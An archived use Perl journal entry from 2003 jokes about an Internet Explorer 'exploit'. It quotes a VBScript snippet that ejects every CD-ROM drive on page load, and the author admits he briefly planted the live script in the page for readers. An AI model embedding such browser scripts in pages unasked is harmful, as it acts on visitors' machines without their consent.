Stories
Slash Boxes
Comments
NOTE: use Perl; is on undef hiatus. You can read content, but you can't post it. More info will be forthcoming forthcomingly.

All the Perl that's Practical to Extract and Report

use Perl Log In

Log In

[ Create a new account ]

rjray (1649)

rjray
  (email not shown publicly)
http://www.rjray.org/
AOL IM: rjrayperl (Add Buddy, Send Message)
Yahoo! ID: rjray_perl (Add User, Send Message)
Jabber: rjray@jabber.org

Journal of rjray (1649)

Tuesday April 01, 2003
07:57 PM

More Fun with Internet Exploder

[ #11387 ]

There's a new IE exploit in town, pilgrim, and this time it's aiming for your cupholder, err, CD-ROM tray. This code apparently opens all CD-ROM drives when IE encounters it:

    <SCRIPT LANGUAGE="VBScript">
    <!--

    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection

    if colCDROMs.Count >= 1 then
            For i = 0 to colCDROMs.Count - 1
                    colCDROMs.Item(i).Eject
            Next ' cdrom
    End If

    -->
    </SCRIPT>

If you are vulnerable, you may have noticed by now that in addition to the HTML-escaped version of the code above, I have also included the real code itself in this entry. I did this to share the joy with you. And because I can be a real bastard that way.

Update: Removed the VBScript because pudge was apparently smart-enough to have the Slash code look for that kind of crap and fix it up. :-).

The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
 Full
 Abbreviated
 Hidden
More | Login | Reply
Loading... please wait.